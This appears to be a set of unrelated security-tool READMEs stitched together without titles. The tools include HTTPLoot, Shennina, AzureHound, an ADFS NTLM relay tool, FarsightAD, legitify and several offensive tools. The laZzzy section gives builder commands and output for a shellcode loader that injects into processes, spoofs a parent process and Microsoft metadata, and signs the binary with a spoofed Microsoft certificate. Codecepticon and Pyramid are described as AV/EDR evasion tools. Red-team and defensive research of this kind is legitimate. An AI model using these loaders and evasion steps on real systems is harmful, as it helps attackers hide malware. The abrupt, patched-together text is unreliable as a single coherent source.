$ ./httploot --help
_____
)=(
/ \ H T T P L O O T
( $ ) v0.1
\___/
[+] HTTPLoot by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Pinaki Mondal (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.
Usage of ./httploot:
-concurrency int
Maximum number of sites to process concurrently (default 100)
-depth int
Maximum depth limit to traverse while crawling (default 3)
-form-length int
Length of the string to be randomly generated for filling form fields (default 5)
-form-string string
Value with which the tool will auto-fill forms, strings will be randomly generated if no value is supplied
-input-file string
Path of the input file conta ining domains to process
-output-file string
CSV output file path to write the results to (default "httploot-results.csv")
-parallelism int
Number of URLs per site to crawl parallely (default 15)
-submit-forms
Whether to auto-submit forms to trigger debug pages
-timeout int
The default timeout for HTTP requests (default 10)
-user-agent string
User agent to use during HTTP requests (default "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0")
-verify-ssl
Verify SSL certificates while making HTTP requests
-wildcard-crawl
Allow crawling of links outside of the domain being scanned
There are two flags which help with the concurrent scanning:
-concurrency
: Specifies the maximum number of sites to process concurrently.-parallelism
: Specifies the number of links per site to crawl parallely.Both -concurrency
and -parallelism
are crucial to performance and reliability of the tool results.
The crawl depth can be specified using the -depth
flag. The integer value supplied to this is the maximum chain depth of links to crawl grabbed on a site.
An important flag -wildcard-crawl
can be used to specify whether to crawl URLs outside the domain in scope.
NOTE: Using this flag might lead to infinite crawling in worst case scenarios if the crawler finds links to other domains continuously.
If you want the tool to scan for debug pages, you need to specify the -submit-forms
argument. This will direct the tool to autosubmit forms and try to trigger error/debug pages once a tech stack has been identified successfully.
If the -submit-forms
flag is enabled, you can control the string to be submitted in the form fields. The -form-string
specifies the string to be submitted, while the -form-length
can control the length of the string to be randomly generated which will be filled into the forms.
Flags like:
-timeout
- specifies the HTTP timeout of requests.-user-agent
- specifies the user-agent to use in HTTP requests.-verify-ssl
- specifies whether or not to verify SSL certificates.Input file to read can be specified using the -input-file
argument. You can specify a file path containing a list of URLs to scan with the tool. The -output-file
flag can be used to specify the result output file path -- which by default goes into a file called httploot-results.csv
.
Further details about the research which led to the development of the tool can be found on our RedHunt Labs Blog.
The tool is licensed under the MIT license. See LICENSE.
Currently the tool is at v0.1.
The RedHunt Labs Research Team would like to extend credits to the creators & maintainers of shhgit for the regular expressions provided by them in their repository.
To know more about our Attack Surface Management platform, check out NVADR.
A summary of the changelog since Augustโs 2022.3 release:
Shennina is an automated host exploitation framework. The mission of the project is to fully automate the scanning, vulnerability scanning/analysis, and exploitation using Artificial Intelligence. Shennina is integrated with Metasploit and Nmap for performing the attacks, as well as being integrated with an in-house Command-and-Control Server for exfiltrating data from compromised machines automatically.
This was developed by Mazin Ahmed and Khalid Farah within the HITB CyberWeek 2019 AI challenge. The project is developed based on the concept of DeepExploit by Isao Takaesu.
Shennina scans a set of input targets for available network services, uses its AI engine to identify recommended exploits for the attacks, and then attempts to test and attack the targets. If the attack succeeds, Shennina proceeds with the post-exploitation phase.
The AI engine is initially trained against live targets to learn reliable exploits against remote services.
Shennina also supports a "Heuristics" mode for identfying recommended exploits.
The documentation can be found in the Docs directory within the project.
The problem should be solved by a hash tree without using "AI", however, the HITB Cyber Week AI Challenge required the project to find ways to solve it through AI.
This project is a security experiment.
This project is made for educational and ethical testing purposes only. Usage of Shennina for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.
Nt*
) functions (not all functions but most)\x90
)Windows machine w/ Visual Studio and the following components, which can be installed from Visual Studio Installer
> Individual Components
:
C++ Clang Compiler for Windows
and C++ Clang-cl for build tools
ClickOnce Publishing
Python3 and the required modules:
python3 -m pip install -r requirements.txt
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃโฃโฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃ โฃคโฃคโฃคโฃคโ โขโฃผโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โขโฃโฃโกโ โ โ โขโฃโฃโฃโฃโฃโกโ โขโฃผโกฟโ โ โ โ โ โ โขโฃโกโ โ โ โฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฐโฃพโ โ โ โขปโฃฟโ โ โ โ โขโฃฟโฃฟโ โ โฃ โฃฟโฃฏโฃคโฃคโ โ โ โ โ โ โขฟโฃทโกโ โฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฟโฃฏ โ โ โขธโฃฟโ โ โ โฃ โฃฟโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โขฟโฃงโฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ ฟโฃทโฃฆโฃดโขฟโฃฟโ โขโฃพโฃฟโฃฟโฃถโฃถโฃถโ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃฟโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃผโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ by: CaptMeeloโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]
options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)
shellcode execution method:
1 Early-bird APC Queue (requires sacrificial proces)
2 Thread Hijacking (requires sacrificial proces)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard
Execute builder.py
and supply the necessary data.
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃโฃโฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃ โฃคโฃคโฃคโฃคโ โข โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โขโฃโฃโกโ โ โ โขโฃโฃโฃโฃโฃโกโ โขโฃผโกฟโ โ โ โ โ โ โขโฃโกโ โ โ โฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฐโฃพโ โ โ โขปโฃฟโ โ โ โ โขโฃฟโฃฟโ โ โฃ โฃฟโฃฏโฃคโฃคโ โ โ โ โ โ โขฟโฃทโกโ โฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฟโฃฏโ โ โ โขธโฃฟโ โ โ โฃ โฃฟโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โขฟโฃงโฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ ฟโฃทโฃฆโฃดโขฟโฃฟโ โขโฃพโฃฟโฃฟโฃถโฃถโฃถโ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃฟโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃผโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ by: CaptMeeloโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6
[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec
[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe
[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: ยฉ Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoftยฎ Windowsยฎ Operating System
[*] ProductVersion: 10.0.22621.608
[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe
[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx
[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe
A framework fro gathering osint on GitHub users, repositories and organizations
Refer to the Wiki for installation instructions, in addition to all other documentation.
Octosuite automatically logs network and user activity of each session, the logs are saved by date and time in the .logs folder
The BloodHound data collector for Microsoft Azure
Download the appropriate binary for your platform from one of our Releases.
The rolling release contains pre-built binaries that are automatically kept up-to-date with the main
branch and can be downloaded from here.
Warning: The rolling release may be unstable.
To build this project from source run the following:
go build -ldflags="-s -w -X github.com/bloodhoundad/azurehound/constants.Version=`git describe tags --exact-match 2> /dev/null || git rev-parse HEAD`"
Print all Azure Tenant data to stdout
โฏ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT"
Print all Azure Tenant data to file
โฏ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT" -o "mytenant.json"
Configure and start data collection service for BloodHound Enterprise
โฏ azurehound configure
(follow prompts)
โฏ azurehound start
โฏ azurehound --help
AzureHound vx.x.x
Created by the BloodHound Enterprise team - https://bloodhoundenterprise.io
The official tool for collecting Azure data for BloodHound and BloodHound Enterprise
Usage:
azurehound [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
configure Configure AzureHound
help Help about any command
list Lists Azure Objects
start Start Azure data collection service for BloodHound Enterprise
Flags:
-c, --config string AzureHound configuration file (default: /Users/dlees/.config/azurehound/config.json)
-h, --help help for azurehound
--json Output logs as json
-j, --jwt string Use an acquired JWT to authenticate into Azure
--log- file string Output logs to this file
--proxy string Sets the proxy URL for the AzureHound service
-r, --refresh-token string Use an acquired refresh token to authenticate into Azure
-v, --verbosity int AzureHound verbosity level (defaults to 0) [Min: -1, Max: 2]
--version version for azurehound
Use "azurehound [command] --help" for more information about a command.
This repository includes two utilities NTLMParse and ADFSRelay. NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS. We have also released a blog post discussing ADFS relaying attacks in more detail [1].
To use the NTLMParse utility you simply need to pass a Base64 encoded message to the application and it will decode the relevant fields and structures within the message. The snippet given below shows the expected output of NTLMParse when it is invoked:
โ ~ pbpaste | NTLMParse
(ntlm.AUTHENTICATE_MESSAGE) {
Signature: ([]uint8) (len=8 cap=585) {
00000000 4e 54 4c 4d 53 53 50 00 |NTLMSSP.|
},
MessageType: (uint32) 3,
LmChallengeResponseFields: (struct { LmChallengeResponseLen uint16; LmChallengeResponseMaxLen uint16; LmChallengeResponseBufferOffset uint32; LmChallengeResponse []uint8 }) {
LmChallengeResponseLen: (uint16) 24,
LmChallengeResponseMaxLen: (uint16) 24,
LmChallengeResponseBufferOffset: (uint32) 160,
LmChallengeResponse: ([]uint8) (len=24 cap=425) {
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 |........|
}
},
NtChallengeResponseFields: (struct { NtChallengeResponseLen uint16; NtChallengeResponseMaxLen uint16; NtChallengeResponseBufferOffset uint32; NtChallengeResponse []uint8; NTLMv2Response ntlm.NTL Mv2_RESPONSE }) {
NtChallengeResponseLen: (uint16) 384,
NtChallengeResponseMaxLen: (uint16) 384,
NtChallengeResponseBufferOffset: (uint32) 184,
NtChallengeResponse: ([]uint8) (len=384 cap=401) {
00000000 30 eb 30 1f ab 4f 37 4d 79 59 28 73 38 51 19 3b |0.0..O7MyY(s8Q.;|
00000010 01 01 00 00 00 00 00 00 89 5f 6d 5c c8 72 d8 01 |........._m\.r..|
00000020 c9 74 65 45 b9 dd f7 35 00 00 00 00 02 00 0e 00 |.teE...5........|
00000030 43 00 4f 00 4e 00 54 00 4f 00 53 00 4f 00 01 00 |C.O.N.T.O.S.O...|
00000040 1e 00 57 00 49 00 4e 00 2d 00 46 00 43 00 47 00 |..W.I.N.-.F.C.G.|
Below is a sample NTLM AUTHENTICATE_MESSAGE message that can be used for testing:
TlRMTVNTUAADAAAAGAAYAKAAAACAAYABuAAAABoAGgBYAAAAEAAQAHIAAAAeAB4AggAAABAAEAA4AgAAFYKI4goAYUoAAAAPqfU7N7/JSXVfIdKvlIvcQkMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwAQQBDAHIAbwBzAHMAZQByAEQARQBTAEsAVABPAFAALQBOAEkARAA0ADQANQBNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDrMB+rTzdNeVkoczhRGTsBAQAAAAAAAIlfbVzIctgByXRlRbnd9zUAAAAAAgAOAEMATwBOAFQATwBTAE8AAQAeAFcASQBOAC0ARgBDAEcAVQA0AEcASABPADAAOAA0AAQAGgBDAE8ATgBUAE8AUwBPAC4ATABPAEMAQQBMAAMAOgBXAEkATgAtAEYAQwBHAFUANABHAEgATwAwADgANAAuAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABQAaAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABwAIAIlfbVzIctgBBgAEAAIAAAAIADAAMAAAAAAAAAABAAAAACAAABQaOHb4nG5F2JL1tA5kL+nKQXJSJLDWljeBv+/XlPXpCgAQAON+EDXYnla0bjpwA8gfVEgJAD4ASABUAFQAUAAvAHMAdABzAC4AYwBvAG4AdABvAHMAbwBjAG8AcgBwAG8AcgBhAHQAaQBvAG4ALgBjAG8AbQAAAAAAAAAAAKDXom0m65knt1NeZF1ZxxQ=
The single required argument for ADFSRelay is the URL of the ADFS server to target for an NTLM relaying attack. Three optional arguments are -debug to enable debugging mode, -port to define the port the service should listen on, and -help to display the help menu. An example help menu is given below:
โ ~ ADFSRelay -h
Usage of ADFSRelay:
-debug
Enables debug output
-help
Show the help menu
-port int
The port the HTTP listener should listen on (default 8080)
-targetSite string
The ADFS site to target for the relaying attack (e.g. https://sts.contoso.com)
โ ~
[1] https://www.praetorian.com/blog/relaying-to-adfs-attacks/
FarsightAD
is a PowerShell script that aim to help uncovering (eventual) persistence mechanisms deployed by a threat actor following an Active Directory domain compromise.
The script produces CSV / JSON file exports of various objects and their attributes, enriched with timestamps from replication metadata. Additionally, if executed with replication privileges, the Directory Replication Service (DRS)
protocol is leveraged to detect fully or partially hidden objects.
For more information, refer to the SANS DFIR Summit 2022 introductory slides.
FarsightAD
requires PowerShell 7
and the ActiveDirectory
module updated for PowerShell 7
.
On Windows 10 / 11, the module can be installed through the Optional Features
as RSAT:
Active Directory Domain Services and Lightweight Directory Services Tools
. Already installed module can be updated with:
Add-WindowsCapability -Online -Name Rsat.ServerManager.Tools~~~~0.0.1.0
If the module is correctly updated, Get-Command Get-ADObject
should return:
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Get-ADObject 1.0.X.X ActiveDirectory
. .\FarsightAD.ps1
Invoke-ADHunting [-Server <DC_IP | DC_HOSTNAME>] [-Credential <PS_CREDENTIAL>] [-ADDriveName <AD_DRIVE_NAME>] [-OutputFolder <OUTPUT_FOLDER>] [-ExportType <CSV | JSON>]
Cmdlet | Synopsis |
---|---|
Invoke-ADHunting | Execute all the FarsightAD AD hunting cmdlets (mentionned below). |
Export-ADHuntingACLDangerousAccessRights | Export dangerous ACEs, i.e ACE that allow takeover of the underlying object, on all the domain's objects. May take a while on larger domain. |
Export-ADHuntingACLDefaultFromSchema | Export the ACL configured in the defaultSecurityDescriptor attribute of Schema classes. Non-default (as defined in the Microsoft documentation) ACLs are identified and potentially dangerous ACEs are highlighted. |
Export-ADHuntingACLPrivilegedObjects | Export the ACL configured on the privileged objects in the domain and highlight potentially dangerous access rights. |
Export-ADHuntingADCSCertificateTemplates | Export information and access rights on certificate templates. The following notable parameters are retrieved: certificate template publish status, certificate usage, if the subject is constructed from user-supplied data, and access control (enrollment / modification). |
Export-ADHuntingADCSPKSObjects | Export information and access rights on sensitive PKS objects (NTAuthCertificates, certificationAuthority, and pKIEnrollmentService). |
Export-ADHuntingGPOObjectsAndFilesACL | Export ACL access rights information on GPO objects and files, highlighting GPOs are applied on privileged users or computers. |
Export-ADHuntingGPOSettings | Export information on various settings configured by GPOs that could be leveraged for persistence (privileges and logon rights, restricted groups membership, scheduled and immediate tasks V1 / V2, machine and user logon / logoff scripts). |
Export-ADHuntingHiddenObjectsWithDRSRepData | Export the objects' attributes that are accessible through replication (with the Directory Replication Service (DRS) protocol) but not by direct query. Access control are not taken into account for replication operations, which allows to identify access control blocking access to specific objects attribute(s). Only a limited set of sensitive attributes are assessed. |
Export-ADHuntingKerberosDelegations | Export the Kerberos delegations that are considered dangerous (unconstrained, constrained to a privileged service, or resources-based constrained on a privileged service). |
Export-ADHuntingPrincipalsAddedViaMachineAccountQuota | Export the computers that were added to the domain by non-privileged principals (using the ms-DS-MachineAccountQuota mechanism). |
Export-ADHuntingPrincipalsCertificates | Export parsed accounts' certificate(s) (for accounts having a non empty userCertificate attribute). The certificates are parsed to retrieve a number of parameters: certificate validity timestamps, certificate purpose, certificate subject and eventual SubjectAltName(s), ... |
Export-ADHuntingPrincipalsDontRequirePreAuth | Export the accounts that do not require Kerberos pre-authentication. |
Export-ADHuntingPrincipalsOncePrivileged | Export the accounts that were once member of privileged groups. |
Export-ADHuntingPrincipalsPrimaryGroupID | Export the accounts that have a non default primaryGroupID attribute, highlighting RID linked to privileged groups. |
Export-ADHuntingPrincipalsPrivilegedAccounts | Export detailed information about members of privileged groups. |
Export-ADHuntingPrincipalsPrivilegedGroupsMembership | Export privileged groups' current and past members, retrieved using replication metadata. |
Export-ADHuntingPrincipalsSIDHistory | Export the accounts that have a non-empty SID History attribute, with resolution of the associated domain and highlighting of privileged SIDs. |
Export-ADHuntingPrincipalsShadowCredentials | Export parsed Key Credentials information (of accounts having a non-empty msDS-KeyCredentialLink attribute). |
Export-ADHuntingPrincipalsTechnicalPrivileged | Export the technical privileged accounts (SERVER_TRUST_ACCOUNT and INTERDOMAIN_TRUST_ACCOUNT). |
Export-ADHuntingPrincipalsUPNandAltSecID | Export the accounts that define a UserPrincipalName or AltSecurityIdentities attribute, highlighting potential anomalies. |
Export-ADHuntingTrusts | Export the trusts of all the domains in the forest. A number of parameters are retrieved for each trust: transivity, SID filtering, TGT delegation. |
More information on each cmdlet usage can be retrieved using Get-Help -Full <CMDLET>
.
Adding a fully hidden user
Hiding the SID History attribute of an user
Uncovering the fully and partially hidden users with Export-ADHuntingHiddenObjectsWithDRSRepData
The C#
code for DRS
requests was adapted from:
MakeMeEnterpriseAdmin
by @vletoux.Mimikatz
by @gentilkiwi and @vletoux.SharpKatz
by @b4rtik.The functions to parse Key Credentials are from the ADComputerKeys PowerShell module
.
The AD CS related persistence is based on work from:
The function to parse Service Principal Name is based on work from Adam Bertram.
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/
Codecepticon is a .NET application that allows you to obfuscate C#, VBA/VB6 (macros), and PowerShell source code, and is developed for offensive security engagements such as Red/Purple Teams. What separates Codecepticon from other obfuscators is that it targets the source code rather than the compiled executables, and was developed specifically for AV/EDR evasion.
Codecepticon allows you to obfuscate and rewrite code, but also provides features such as rewriting the command line as well.
! Before we begin !
This documentation is on how to install and use Codecepticon only. Compilation, usage, and support for tools like Rubeus and SharpHound will not be provided. Refer to each project's repo separately for more information.
Codecepticon is actively developed/tested in VS2022, but it should work in VS2019 as well. Any tickets/issues created for VS2019 and below, will not be investigated unless the issue is reproducible in VS2022. So please use the latest and greatest VS2022.
The following packages MUST be v3.9.0, as newer versions have the following issue which is still open: dotnet/roslyn#58463
Codecepticon checks the version of these packages on runtime and will inform you if the version is different to v3.9.0.
It cannot be stressed this enough: always test your obfuscated code locally first.
Open Codecepticon, wait until all NuGet packages are downloaded and then build the solution.
There are two ways to use Codecepticon, either by putting all arguments in the command line or by passing a single XML configuration file. Due to the high level of supported customisations, It's not recommended manually going through --help
output to try and figure out which parameters to use and how. Use CommandLineGenerator.html and generate your command quickly:
The command generator's output format can be either Console
or XML
, depending what you prefer. Console commands can be executed as:
Codecepticon.exe --action obfuscate --module csharp --verbose ...etc
While when using an XML config file, as:
Codecepticon.exe --config C:\Your\Path\To\The\File.xml
If you want to deep dive into Codecepticon's functionality, check out this document.
For tips you can use, check out this document.
Obfuscating a C# project is simple, simply select the solution you wish to target. Note that a backup of the solution itself will not be taken, and the current one will be the one that will be obfuscated. Make sure that you can independently compile the target project before trying to run Codecepticon against it.
The VBA obfuscation works against source code itself rather than a Microsoft Office document. This means that you cannot pass a doc(x)
or xls(x)
file to Codecepticon. It will have to be the source code of the module itself (press Alt-F11 and copy the code from there).
Due to the complexity of PowerShell scripts, along with the freedom it provides in how to write scripts it is challenging to cover all edge cases and ensure that the obfuscated result will be fully functional. Although it's expected for Codecepticon to work fine against simple scripts/functionality, running it against complex ones such as PowerView will not work - this is a work in progress.
After obfuscating an application or a script, it is very likely that the command line arguments have also been renamed. The solution to this is to use the HTML mapping file to find what the new names are. For example, let's convert the following command line:
SharpHound.exe --CollectionMethods DCOnly --OutputDirectory C:\temp\
By searching through the HTML mapping file for each argument, we get:
And by replacing all strings the result is:
ObfuscatedSharpHound.exe --AphylesPiansAsp TurthsTance --AnineWondon C:\temp\
However, some values may exist in more than one category:
Therefore it is critical to always test your result in a local environment first.
The compiled output includes a lot of dependency DLLs, which due to licensing requirements we can't re-distribute without written consent.
No, Codecepticon should work with everything. The profiles are just a bit of extra tweaks that are done to the target project in order to make it more reliable and easier to work with.
But as all code is unique, there will be instances where obfuscating a project will end up with an error or two that won't allow it to be compiled or executed. In this case a new profile may be in order - please raise a new issue if this is the case.
Same principle applies to PowerShell/VBA code - although those currently have no profiles that come with Codecepticon, it's an easy task to add if some are needed.
For reporting bugs and suggesting new features, please create an issue.
For submitting pull requests, please see the Contributions section.
Before running Codecepticon make sure you can compile a clean version of the target project. Very often when this issue appears, it's due to missing dependencies for the target solution rather than Codecepticon. But if it still doesn't compile:
I will do my best, but as PowerShell scripts can be VERY complex and the PSParser isn't as advanced as Roslyn for C#, no promises can be made. Same applies for VBA/VB6.
You may at some point encounter the following error:
Still trying to get to the bottom of this one, a quick fix is to uninstall and reinstall the System.Collections.Immutable
package, from the NuGet Package Manager.
Whether it's a typo, a bug, or a new feature, Codecepticon is very open to contributions as long as we agree on the following:
Strengthen the security posture of your GitHub organization!
Detect and remediate misconfigurations, security and compliance issues across all your GitHub assets with ease
ย
git clone git@github.com:Legit-Labs/legitify.git
go run main.go analyze ...
To enhance the software supply chain security of legitify's users, as of v0.1.6, every legitify release contains a SLSA Level 3 Provenacne document.
The provenance document refers to all artifacts in the release, as well as the generated docker image.
You can use SLSA framework's official verifier to verify the provenance.
Example of usage for the darwin_arm64 architecture for the v0.1.6 release:
VERSION=0.1.6
ARCH=darwin_arm64
./slsa-verifier verify-artifact --source-branch main --builder-id 'https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v1.2.2' --source-uri "git+https://github.com/Legit-Labs/legitify" --provenance-path multiple.intoto.jsonl ./legitify_${VERSION}_${ARCH}.tar.gz
-t
) or as an environment variable ($GITHUB_ENV
). The PAT needs the following scopes for full analysis:admin:org, read:enterprise, admin:org_hook, read:org, repo, read:repo_hook
See Creating a Personal Access Token for more information.
Fine-grained personal access tokens are currently not supported because they do not support GitHub's GraphQL (https://github.blog/2022-10-18-introducing-fine-grained-personal-access-tokens-for-github/)
LEGITIFY_TOKEN=<your_token> legitify analyze
By default, legitify will check the policies against all your resources (organizations, repositories, members, actions).
You can control which resources will be analyzed with command-line flags namespace and org:
--namespace (-n)
: will analyze policies that relate to the specified resources--org
: will limit the analysis to the specified organizationsLEGITIFY_TOKEN=<your_token> legitify analyze --org org1,org2 --namespace organization,member
The above command will test organization and member policies against org1 and org2.
You can run legitify against a GitHub Enterprise instance if you set the endpoint URL in the environment variable SERVER_URL
:
export SERVER_URL="https://github.example.com/"
LEGITIFY_TOKEN=<your_token> legitify analyze --org org1,org2 --namespace organization,member
To run legitify against GitLab Cloud set the scm flag to gitlab --scm gitlab
, to run against GitLab Server you need to provide also SERVER_URL:
export SERVER_URL="https://gitlab.example.com/"
LEGITIFY_TOKEN=<your_token> legitify analyze --namespace organization --scm gitlab
Namespaces in legitify are resources that are collected and run against the policies. Currently, the following namespaces are supported:
organization
- organization level policies (e.g., "Two-Factor Authentication Is Not Enforced for the Organization")actions
- organization GitHub Actions policies (e.g., "GitHub Actions Runs Are Not Limited To Verified Actions")member
- organization members policies (e.g., "Stale Admin Found")repository
- repository level policies (e.g., "Code Review By At Least Two Reviewers Is Not Enforced")runner_group
- runner group policies (e.g, "runner can be used by public repositories")By default, legitify will analyze all namespaces. You can limit only to selected ones with the --namespace
flag, and then a comma separated list of the selected namespaces.
By default, legitify will output the results in a human-readable format. This includes the list of policy violations listed by severity, as well as a summary table that is sorted by namespace.
Using the --output-format (-f)
flag, legitify supports outputting the results in the following formats:
human-readable
- Human-readable text (default).json
- Standard JSON.Using the --output-scheme
flag, legitify supports outputting the results in different grouping schemes. Note: --output-format=json
must be specified to output non-default schemes.
flattened
- No grouping; A flat listing of the policies, each with its violations (default).group-by-namespace
- Group the policies by their namespace.group-by-resource
- Group the policies by their resource e.g. specific organization/repository.group-by-severity
- Group the policies by their severity.--output-file
- full path of the output file (default: no output file, prints to stdout).--error-file
- full path of the error logs (default: ./error.log).When outputting in a human-readable format, legitify support the conventional --color[=when]
flag, which has the following options:
auto
- colored output if stdout is a terminal, uncolored otherwise (default).always
- colored output regardless of the output destination.none
- uncolored output regardless of the output destination.--failed-only
flag to filter-out passed/skipped checks from the result.scorecard is an OSSF's open-source project:
Scorecards is an automated tool that assesses a number of important heuristics ("checks") associated with software security and assigns each check a score of 0-10. You can use these scores to understand specific areas to improve in order to strengthen the security posture of your project. You can also assess the risks that dependencies introduce, and make informed decisions about accepting these risks, evaluating alternative solutions, or working with the maintainers to make improvements.
legitify supports running scorecard for all of the organization's repositories, enforcing score policies and showing the results using the --scorecard
flag:
no
- do not run scorecard (default).yes
- run scorecard and employ a policy that alerts on each repo score below 7.0.verbose
- run scorecard, employ a policy that alerts on each repo score below 7.0, and embed its output to legitify's output.legitify runs the following scorecard checks:
Check | Public Repository | Private Repository |
---|---|---|
Security-Policy | V | |
CII-Best-Practices | V | |
Fuzzing | V | |
License | V | |
Signed-Releases | V | |
Branch-Protection | V | V |
Code-Review | V | V |
Contributors | V | V |
Dangerous-Workflow | V | V |
Dependency-Update-Tool | V | V |
Maintained | V | V |
Pinned-Dependencies | V | V |
SAST | V | V |
Token-Permissions | V | V |
Vulnerabilities | V | V |
Webhooks | V | V |
legitify comes with a set of policies in the policies/github
directory. These policies are documented here.
In addition, you can use the --policies-path (-p)
flag to specify a custom directory for OPA policies.
Thank you for considering contributing to Legitify! We encourage and appreciate any kind of contribution. Here are some resources to help you get started:
Pyramid is a set of Python scripts and module dependencies that can be used to evade EDRs. The main purpose of the tool is to perform offensive tasks by leveraging some Python evasion properties and looking as a legit Python application usage. This can be achieved because:
For more information please check the DEFCON30 - Adversary village talk "Python vs Modern Defenses" slide deck and this post on my blog.
